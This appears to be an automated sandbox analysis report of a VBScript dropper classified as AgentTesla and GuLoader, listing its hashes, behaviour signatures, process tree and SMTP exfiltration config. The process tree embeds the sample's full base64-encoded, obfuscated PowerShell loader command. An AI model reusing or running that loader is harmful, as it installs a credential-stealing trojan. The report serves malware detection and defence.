Edit tour

Windows Analysis Report
PUMP mt310143121.vbs

Overview

General Information

Sample Name:	PUMP mt310143121.vbs
Analysis ID:	715071
MD5:	41ad96654d44ef375097eeeb83818cf7
SHA1:	20dae7bc9d6dc2c5f947de3f871d617fb36e6edc
SHA256:	28bf271ec1576c0e7d1b2a243de952bb70c25711cdc9c2d4494002a3e2f346ca
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Sigma detected: Dot net compiler compiles file from suspicious location

Antivirus detection for URL or domain

Yara detected GuLoader

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Compiles code for process injection (via .Net compiler)

Wscript starts Powershell (via cmd or directly)

Potential malicious VBS script found (suspicious strings)

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Encrypted powershell cmdline option found

Very long command line found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Contains functionality to detect virtual machines (SLDT)

Uses SMTP (mail sending)

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Compiles C# or VB.Net code

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

wscript.exe (PID: 8888 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)

powershell.exe (PID: 9092 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATABpAE0ARABvAG8ATQBlAGQARQBuAHUARgB1AGwATABpAGUATgBvAEgAdQBuAGEAVgByAG4ASwBhAGQASABlAGwAVgBlAGUAUgBlACgATwBwAGkAawBsAG4ASwBiAHQAVQBuACAARABhAEQAVABlAGkAVgByAHMAVABhADQAUwB0ADAAYwBlACkAUQB1ADsACgBFAGsAWwBhAG4ARABBAGYAbABMAG8AbABVAG4ASQBIAGwAbQBFAGYAcABVAG4AbwBQAHUAcgBZAG4AdABUAGkAKABCAGEAIgBHAGEAdQBCAGwAcwBWAGUAZQBEAG8AcgBVAGQAMwBBAHIAMgBTAG8AIgBEAGEAKQBHAHIAXQBCAGUAcABCAG8AdQBTAGsAYgBOAGUAbABVAHIAaQBPAHUAYwBSAGEAIABKAHUAcwBhAG0AdABCAHIAYQBGAGEAdABTAGMAaQBGAGkAYwBBAGcAIABJAHQAZQBNAGEAeABNAG8AdABSAGUAZQBEAGUAcgBnAG4AbgBVAGQAIABDAGwAaQBCAHIAbgBBAGQAdABLAHUAIABCAHIASQBQAGEAcwBVAG4ARABIAGEAbABBAHMAZwBsAGEAQgBWAGcAdQBmAGEAdABBAGIAdABQAHMAbwBUAHIAbgBEAGUAQwBvAHYAaABFAHIAZQBTAHQAYwBGAGEAawBCAGkAZQBEAGUAZABUAGkAKABGAG8AaQBFAG0AbgBBAGwAdABCAGUAIABQAGEATABUAGkAeQBOAG8AcwBTAGEAawBQAGkAdQBzAHQALABGAG8AaQBnAHIAbgBVAGQAdABmAHUAIABBAG4AUwBJAG0AaQBQAG8AbgBBAGYAaQBUAGoAcwBEAGkAOQBGAGUANABBAHAAKQBhAGYAOwAKAFMAcABbAEYAbABEAFQAaQBsAHMAYQBsAFMAaQBJAFMAcABtAEIAcgBwAEwAZwBvAEUAawByAFAAcgB0AE8AdgAoAFUAbAAiAFUAbgBBAEEAbgBEAEsAdQBWAFAAbABBAEIAaQBQAEgAeQBJAEMAbwAzAEMAYQAyAFAAYQAuAFIAaQBEAEQAaQBMAFIAZQBMAGQAYQAiAFMAcAApAFAAcgBdAFMAdQBwAFQAbwB1AG4AaQBiAFIAaQBsAEQAaQBpAFYAaQBjAFMAdAAgAGIAbwBzAEQAYQB0AEcAYQBhAGYAcgB0AEUAbgBpAEgAeQBjAFUAbgAgAFAAdQBlAHMAbAB4AE4AbwB0AFMAYwBlAFIAZQByAFMAZQBuAGcAcgAgAEMAaABpAHMAYwBuAE8AcAB0AFAAZQAgAEMAaABEAEgAeQBlAE0AaQBsAE4AaQBlAE0AeQB0AE4AbwBlAEQAZQBTAEkAbABlAFYAZQByAEcAaQB2AFIAYQBpAEQAdQBjAFMAYwBlAEsAcgAoAHgAYQBpAEYAbwBuAFQAYQB0AE4AaQAgAEcAZQBBAFMAYwByAEQAbwBjAEsAYQApAGwAZQA7AAoAUwBwAFsARQBtAEQARwBsAGwAUgBpAGwAUwB0AEkARABlAG0AVABlAHAASABvAG8AQQBtAHIARABlAHQARQBpACgAQwBhACIAUwB0AHUASQBuAHMARgByAGUAQwBlAHIAQQByADMAUwBhADIAUABpACIATQBvACkAQwBoAF0AVgByAHAARgByAHUATQBhAGIARgBvAGwASABhAGkARQB4AGMARgBhACAAVQBkAHMAQQByAHQAUgBpAGEATQBhAHQAVABoAGkASQBtAGMASABlACAAUABzAGUASwBvAHgAVAByAHQAQgBsAGUATgBvAHIAVQBwAG4AVQBiACAAZwBuAGkAQwB1AG4AQwBlAHQAUABvACAAUABlAEMATgBvAHIAdwBoAGUARgBlAGEASABvAHQAUAByAGUAUAByAEMAcABpAGEAUwB1AHIAUwBuAGUASQByAHQAZABlACgAQgBvAGkARABpAG4ATwBsAHQAQwBlACAAQQBuAFAARwB1AG8AVABhAGsARwBsAGkAQgBvAGUAcwBlACwAbQBhAGkASwBhAG4ATgBkAHQAVQBlACAAUwB1AFMAQwBvAHUARQBzAHAARABpACwAUwB0AGkATgBvAG4ASQBuAHQAVwBlACAAVQBuAEIAcwBsAGkAVABpAG8AQgBqAHYAUwB1AGEAUgB1ADEAUAB5ADMARABpADcAUwBvACwAUwBrAGkAUwBwAG4AVQBkAHQAUABlACAAVQBkAEkAVgBhAGsATQBvAGEARwByAHMAUwBrAHQASAByAGwAUwBvACkAcgBhADsACgBBAHAAWwBTAHUARABTAHQAbABQAGUAbABHAGUASQBUAGgAbQBQAG8AcABTAHAAbwBUAGkAcgBTAHQAdABRAGEAKABTAGMAIgBOAGUAawBTAGkAZQBCAGkAcgBLAGwAbgBPAHIAZQBSAGUAbABTAGwAMwBTAG8AMgBVAGwAIgBWAGkAKQBtAHUAXQBBAGcAcABFAG4AdQB0AGUAYgBBAHQAbABDAG8AaQBDAHkAYwBTAGgAIABPAHAAcwBFAGYAdABMAHUAYQBPAHYAdABDAG8AaQBNAGEAYwBBAGYAIABJAGQAZQBCAGUAeAByAGUAdABGAG8AZQBUAGUAcgBTAGsAbgBEAGkAIABMAG8AdgBkAGEAbwBXAGgAaQBJAG4AZABUAGUAIABGAHIAUgBTAGEAdAB0AGEAbABUAHUATQBDAG8AbwBaAGUAdgBIAHIAZQBMAGkATQB2AGEAZQBBAG4AbQBNAHUAbwBDAGEAcgBBAHIAeQBSAGgAKABUAHIASQBQAHIAbgBNAGkAdABMAGoAUABZAG4AdABDAGEAcgBhAHIAIABSAGEAdQBJAHMAdgBTAGUAbwBMAGcAcgBIAHkAMQBEAGEALABQAGUAcgBBAGYAZQBGAGwAZgBWAGkAIABNAGEASQBMAGwAbgBLAGUAdABVAGwAMwBzAG8AMgBTAGEAIABGAGkAdQBCAGUAdgBNAHUAbwBLAGEAcgBDAHIAMgBUAGkALABCAGkAaQBJAG4AbgBKAGUAdABNAGkAIABKAGEAdQBDAG8AdgBQAHIAbwBUAGkAcgBEAGkAMwBCAGUAKQBMAGkAOwAKAFAAcgBbAEgAagBEAFAAaQBsAGUAbQBsAEEAbgBJAEgAagBtAFMAYQBwAFYAYQBvAGYAcgByAEYAbwB0AFUAbgAoAEEAdQAiAEcAZQB1AFIAZQBzAFMAaQBlAEEAYQByAFMAeQAzAEIAcgAyAEcAYQAiAFIAYQApAE8AcgBdAE4AbwBwAEUAcgB1AEEAZwBiAGkAbgBsAFMAYwBpAFMAdABjAFUAdAAgAGwAZQBzAFQAbwB0AEEAbgBhAEUAcgB0AFMAawBpAGkAbgBjAGMAYQAgAEQAaQBlAEQAcgB4AFAAcgB0AHMAbgBlAFMAdQByAEgAeQBuAEIAZQAgAFIAZQBpAFMAdQBuAEEAbQB0AFUAZAAgAEgAeQBHAEEAZgBlAEQAZQB0AEMAYQBGAEMAZQBvAFUAbgBjAEUAeAB1AEQAdQBzAFIAZQAoAFUAZAApAFMAYQA7AAoATQBhAFsARABlAEQAQwBvAGwATwBwAGwATwBjAEkARgBvAG0AaQBkAHAAVwBvAG8AUABsAHIASABlAHQAWQBuACgAQwBhACIASQBtAHUAYgByAHMAUgBpAGUAVABoAHIAUABsADMATQBvADIATABpACIAbwBwACwAQgByACAAUwBvAEUAVgBpAG4ARQBuAHQAZABlAHIAVABlAHkARgBlAFAAVgBpAG8ASwBvAGkAQgBhAG4AQQBzAHQAUwB0AD0AUwBsACIARABlAEUAUAByAG4AUgBpAHUAVABlAG0AcwBhAFcAUABlAGkAQgBvAG4ATQBhAGQAQQBuAG8AUwBlAHcAUABhAHMARgBpACIARABhACkARQBzAF0ATQBlAHAASQBvAHUARQBrAGIAVQBkAGwAUwB0AGkAdABpAGMAQwBjACAAUwBlAHMAQwBuAHQAQQBuAGEAVABoAHQARABiAGkAUgBlAGMAUwBrACAASgBlAGUASwBpAHgAQwB5AHQATwBtAGUAUgB1AHIAawBvAG4ASgBkACAAUwBlAEkATABhAG4AVAB5AHQASABpAFAAUwBwAHQARwByAHIAVABoACAAUwBsAFYAUwBrAGkAQgBhAHQATABuAHIAcwBtAHUAQQB3AHMAQQByAGEAUgBlADMASABlADIATgBuACgAUgB1AHUAUABpAGkARQB4AG4AUwB2AHQATABlACAAbABpAHUAVABpAHYAUgBlAG8ATgBlAHIASQBuADUAUwB1ACwASgBhAGkAUwB0AG4ARgBpAHQAUwBpACAAUwBrAHUAQgBlAHYAQQBmAG8ASABhAHIARwBsADYAVABvACkAUwBhADsACgBDAGkAWwBEAGEARABVAHAAbABQAG8AbABVAG4ASQBLAHIAbQBHAHIAcABoAG8AbwBTAHkAcgBJAG4AdABTAGUAKABTAG8AIgBOAHMAawBkAGUAZQBTAHMAcgBSAGkAbgBDAG8AZQBQAHIAbABDAHIAMwB1AGwAMgBFAHgAIgBUAHIAKQBTAGsAXQBuAGUAcABCAGUAdQBQAGUAYgBJAG0AbABOAGkAaQBSAGkAYwBDAGEAIABCAHUAcwBSAGUAdABOAGUAYQBJAG4AdABGAG8AaQBJAG4AYwBjAG8AIABMAG8AZQBIAGkAeABJAGQAdABGAGkAZQBVAG4AcgBCAGUAbgBTAGsAIABTAG8AaQBUAGEAbgBTAGEAdABJAG4AIABQAHIAUwBUAGEAZQBUAG8AdABQAHIAVABEAGEAaABTAHkAcgBEAHYAZQBVAGgAYQBjAG8AZABCAHIAQwBEAGkAbwBQAG8AbgBBAGYAdABOAGUAZQBEAGUAeABBAGwAdABSAGUAKABIAG8AaQBSAGEAbgBPAHIAdABGAHUAIABwAGUATgBEAGEAZQBTAHQAZABTAHUAZgBUAHIAbwBGAG8AdABTAHQALABQAHIAaQBLAHUAbgBVAG4AdABUAGUAIABXAGEATgBTAGsAbwBTAHYAbgBVAGQAZwBGAHIAKQBKAGUAOwAKAEcAdQBbAEIAZQBEAEYAeQBsAFAAbwBsAHMAZQBJAFAAcgBtAFMAaABwAEIAcgBvAEMAcgByAEMAbwB0AEIAdQAoAEMAbwAiAFAAZQBrAEgAaQBlAE0AZQByAEcAdQBuAEYAYQBlAEEAdQBsAEIAYQAzAFMAaAAyAFQAYQAiAEYAbAAsAEIAcgAgAE0AeQBFAEsAaQBuAFMAcAB0AEcAeQByAFIAZQB5AE8AZABQAFAAcgBvAEUAbgBpAEUAZgBuAEwAYQB0AFUAawA9AFIAZQAiAFMAeQAkAFAAZQB1AEEAbAB2AEMAaABvAFUAZAByAHMAawA5AEQAbwAiAEMAbwApAFMAZQBdAFQAYQBwAE0AYQB1AEMAbwBiAEMAaABsAE8AdgBpAEYAeQBjAE0AYQAgAGkAbgBzAE0AZQB0AFMAaQBhAFIAZQB0AEQAZQBpAG0AZQBjAEcAcgAgAGQAeQBlAFUAbgB4AEwAdQB0AG8AdQBlAFMAcQByAEsAYQBuAEUAcwAgAE4AYQBpAEYAbABuAEEAbgB0AFQAaQAgAE8AdQBUAFAAYQBFAFAAZQBMAE0AbwBPAFQAaQAoAFMAYwBpAEsAawBuAEkAbgB0AE8AcAAgAFQAYQBDAFUAZABsAFUAdgBhAEYAbwBkAFMAdgBvAEIAZQBnAFIAYQBlAFMAaQBuAEMAbwBlAEcAZQB0AEgAYQA2AHMAcgAsAEYAaQAgAE8AcABpAFcAYQBuAFYAYQB0AEUAeAAgAE0AYQBEAFAAcgB5AEIAZQBuAEQAZQBlAEIAbwAsAFMAbwBpAEkAbgBuAEYAbAB0AFoAeQAgAFQAZQB1AEQAYQB2AFMAYQBvAEEAcgByAHMAawAsAEsAbAAgAFIAZQBpAEQAcgBuAFQAcgB0AEYAZQAgAEYAbgBDAE4AbwBsAEIAZQBhAFIAZQBkAEIAYQBvAEcAbwBnAFMAdQBlAEYAbwBuAFMAdABlAFIAZQB0AEkAbgApAFMAYQA7AAoATABpAH0ACgBEAG8AIgBMAHIAQAAKAEcAcgAkAEkAbgBDAEYAaQBsAE4AdQBhAEgAZQBkAEsAZQBvAEQAZQBnAEwAYQBlAEoAdQBuAE0AbwBlAFIAZQB0AEIAbwAzAGQAbwA9AFIAbwBbAFMAdABDAHMAYQBsAEwAZQBhAFMAdABkAEIAZQBvAFYAZQBnAFIAYQBlAFkAbwBuAFMAbwBlAEIAcgB0AFUAZAAxAEoAYQBdAFkAbwA6AEYAbAA6AFIAaABUAEEAbABFAEYAbwBMAEYAbwBPAEcAcgAoAEwAaQAwAE0AYQAsAFMAZQAxAFAAZQAwAE0AYQA0AFMAdQA4AFQAcgA1AFMAbwA3AE0AbwA2AEEAZQAsAFQAdQAxAFMAcAAyAFIAdQAyAEEAYwA4AEkAbgA4AEUAcAAsAEcAdQA2AEgAYQA0AEwAbwApAAoAaQBuACQAUwBrAEsAUwBrAHYAUwB0AGEAUwBlAHIARQBkAHQASwBvAGEAUwBhAGwARABvAHMARgBvAHYARgBvAD0AVABhACgASwBsAEcAUABhAGUAQgByAHQAQQBtAC0ATQBhAEkARQBuAHQARgBsAGUATABkAG0AVABhAFAARgBvAHIAcABlAG8AQgBsAHAARABvAGUAVQBuAHIARABhAHQASgB1AHkARABpACAAUgBvAC0AUwB5AFAAVABpAGEAUwB1AHQATgByAGgAVQBkACAAVgBhACIAQQByAEgAVgBhAEsASABqAEMAUABvAFUAQwBhADoAQQBmAFwASwByAFMAVABlAG8ASQBuAGYARgBvAHQARgB1AHcARQBsAGEAVgBpAHIASABvAGUAUwBsAFwAVwBvAGQATgBvAHIAYwBhAG0ARgBsAG0ATwB2AGUASwB2AHIAUwBoACIAUABlACkARAB1AC4AVABlAHMASQBtAGsAQgBhAG8AVQB1AGwAVAByAGUACgBGAG8AJABVAGQASQBPAG4AbgBHAHUAdABUAG8AZQBFAHgAcgBDAGEAcABDAGUAbABUAGEAIABEAHIAPQBTAHkAIABDAG8AWwB1AG4AUwBFAHYAeQBSAGUAcwBTAHQAdABTAGwAZQBCAHIAbQBTAGEALgBVAGQAQgBEAHUAeQBDAGUAdABCAHUAZQBzAGsAWwBOAGUAXQBPAG0AXQBDAG8AOgBPAHYAOgBGAHkAQwBSAGUAcgBSAGUAZQBNAG8AYQBOAGEAdABTAGsAZQBUAGUASQBTAHAAbgBLAGEAcwBTAHkAdABCAGoAYQBQAHIAbgBEAGUAYwBUAHIAZQBlAHUAKABFAHgAWwBPAHAAUwBGAG8AeQBBAGMAcwBBAGYAdABCAGkAZQBrAG8AbQBQAGEALgBOAGUAQgBBAGMAeQBhAGwAdABUAHIAZQBTAGkAXQBCAGwALABTAHAAJABGAGUASwBTAGwAdgBOAGEAYQBXAGEAcgBQAGEAdABDAG8AYQBSAGUAbABSAGUAcwBGAG8AdgBiAGkALgBIAHkATABTAGUAZQBPAHYAbgBSAGUAZwBGAG8AdABCAG8AaABNAGkAIABTAHQALwBSAGUAIABTAG0AMgBSAGEAKQAKAEMAaQBGAFMAagBvAE8AdQByAEUAcAAoAEYAbwAkAEEAZwBpAEUAcwA9AEkAbgAwAGYAcgA7AEIAZQAgAHQAZQAkAFMAZQBpAFMAaQAgAFUAcgAtAEwAYQBsAFQAbwB0AFMAYQAgAEMAbwAkAFMAYQBLAEEAbgB2AE4AeQBhAFAAcgByAEkAcwB0AEYAcgBhAEIAcgBsAFYAYQBzAEgAdQB2AEgAZQAuAE8AbABMAFUAbgBlAEMAbABuAEYAZQBnAEMAbwB0AFAAYQBoAFQAYQA7AFMAbwAgAEUAbgAkAE0AYQBpAEEAdQArAEsAdQA9AEkAbgAyAEQAZQApAAoAUwBuAHsACgBPAHYACQBVAGQAJABMAGUASQBOAG8AbgBTAGwAdABIAGkAZQBTAGEAcgBIAHkAcABUAHUAbABBAGwAWwBBAG4AJABxAHUAaQBLAHYALwBuAHUAMgBGAGkAXQBBAHIAIABWAG8APQBGAG8AIABGAGkAWwBDAGUAYwBJAG4AbwBFAG0AbgBiAGEAdgBWAGEAZQBTAHQAcgBTAHIAdABPAGwAXQBLAG4AOgBPAHAAOgBTAGkAVABGAGkAbwBEAGUAQgBSAGEAeQBLAG8AdABUAHYAZQBZAGEAKABsAGEAJABNAGEASwBWAG8AdgBNAGEAYQBMAGEAcgBVAG4AdABEAGUAYQBNAGUAbABCAGEAcwBSAGUAdgBEAHIALgBHAGEAUwBWAGEAdQBEAGkAYgBNAGUAcwBXAGUAdABVAHAAcgBEAGkAaQBIAHMAbgBTAHQAZwBUAGUAKABEAHkAJABNAGEAaQBFAHMALABSAGUAIABBAHIAMgBJAG4AKQBzAHQALABCAGUAIABJAG4AMQBQAGkANgBTAGEAKQAKAEYAbwB9AAoAQQB1AGYATwB2AG8ATAB1AHIASgBlACgAVAB5ACQAUwB2AFMAUgBoAHYAawBvAGUAVgByAGoATgB5AHMAYwBoAGUARwBvAG0ASwByAGUATwBwAD0AZABhADAARgBpADsATABpACAAVABhACQAUgBlAFMAQgBsAHYAUgB1AGUAVQBkAGoAVQBkAHMASQBuAGUATgBhAG0AQQBjAGUATQBhACAASwBvAC0AQQBzAGwAUwBhAHQAcwB1ACAASAB5ACQAdQBuAEkAVQBuAG4ASABrAHQAcwBlAGUARgBvAHIARwBhAHAAVQBuAGwARgBpAC4AQQB1AGMASAB5AG8AUwBhAHUAUAByAG4ARgByAHQAUwBtACAAVABqADsAUgBlACAASwByACQASwBsAFMATwBsAHYAWgBpAGUAUwBrAGoAUgB1AHMAVgBlAGUATgB5AG0ATABpAGUASwBhACsARABpACsAUwBuACkACgBTAGUAewAKAEIAaQAJAEgAZQBbAFQAaQBDAFcAaABsAFMAZQBhAFMAdABkAEMAaABvAFMAawBnAEwAaQBlAGYAbwBuAEEAcgBlAEMAbwB0AEEAYgAxAEIAbABdAEUAZgA6AFQAcgA6AFAAaQBSAFQAagB0AHAAaABsAFUAbABNAEQAYQBvAE8AdQB2AEQAeQBlAFUAbgBNAEUAbgBlAEEAZABtAEQAaQBvAEwAbwByAFUAbgB5AGcAaQAoAFcAYQAkAFMAdQBDAEYAZQBsAEwAbwBhAEEAZABkAEgAeQBvAE8AdQBnAEcAcgBlAFAAbABuAEMAaABlAFUAbgB0AEEAcgAzAFIAZQArAFMAYwAkAFUAbgBTAFkAdQB2AFUAbgBlAE4AaQBqAEMAbwBzAGEAcgBlAEgAcgBtAHMAbwBlAE0AZQAsAGYAcgBbAEkAZAByAFUAbgBlAEQAdQBmAFAAbABdAEMAbAAkAEQAZQBJAFMAeQBuAEcAcgB0AEQAZQBlAGIAZQByAFUAbgBwAEkAbQBsAHYAaQBbAEcAZQAkAFQAZQBTAEYAaQB2AEQAaQBlAEIAYQBqAE0AbwBzAFIAZQBlAEwAaQBtAE8AdQBlAFAAdQBdAFUAbgAsAFQAdgAxAFMAdQApAAoATwBtAH0ACgBMAGkAWwBQAGUAQwBLAGEAbABTAGwAYQBiAG8AZABVAG4AbwBGAGEAZwBFAGwAZQBhAGcAbgBDAGEAZQBXAGkAdABNAHUAMQB0AHUAXQBCAG8AOgBNAG8AOgBLAHIAVgBQAHIAaQBQAHIAdABIAGUAcgBPAHIAdQBSAGEAcwBVAG4AYQBTAHQAMwBTAGEAMgBOAGUAKABUAHIAJABUAGkAQwBWAGkAbABwAGEAYQBJAG4AZABDAHkAbwBTAGwAZwBJAG0AZQBOAG8AbgBTAGEAZQBHAGwAdABTAHQAMwBEAGkALABBAGEAIABWAGkAMABGAG8AKQBMAG8AIwAKACcAQAANAAoADQAKAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0AMgA7ACAAJABpACAALQBsAHQAIAAkAE0AaQBsAGoAdgByAG4AZQB0AGwALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAAyACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJAB1AHYAbwByACAAPQAgACQAdQB2AG8AcgAgACsAIAAkAE0AaQBsAGoAdgByAG4AZQB0AGwALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABNAGkAbABqAHYAcgBuAGUAdABsAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAHUAdgBvAHIAIAA9ACAAJAB1AHYAbwByACAAKwAgACIAYABuACIADQAKAAkACQAkAGkAIAA9ACAAJABpACAAKwAgADEADQAKAAkAfQAgAAkADQAKAAkACQANAAoACQANAAoAfQANAAoADQAKAA0ACgBJAEUAWAAgACQAdQB2AG8AcgANAAoA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 9100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

csc.exe (PID: 4664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 6776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

CasPol.exe (PID: 6376 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 6564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "COCO_.zipCookieapplication/zip-f \\Data\\Tor\\torrcp=127.0.0.1POST+%2Bapplication/x-www-form-urlencoded"}

Yara Signatures

Memory Dumps

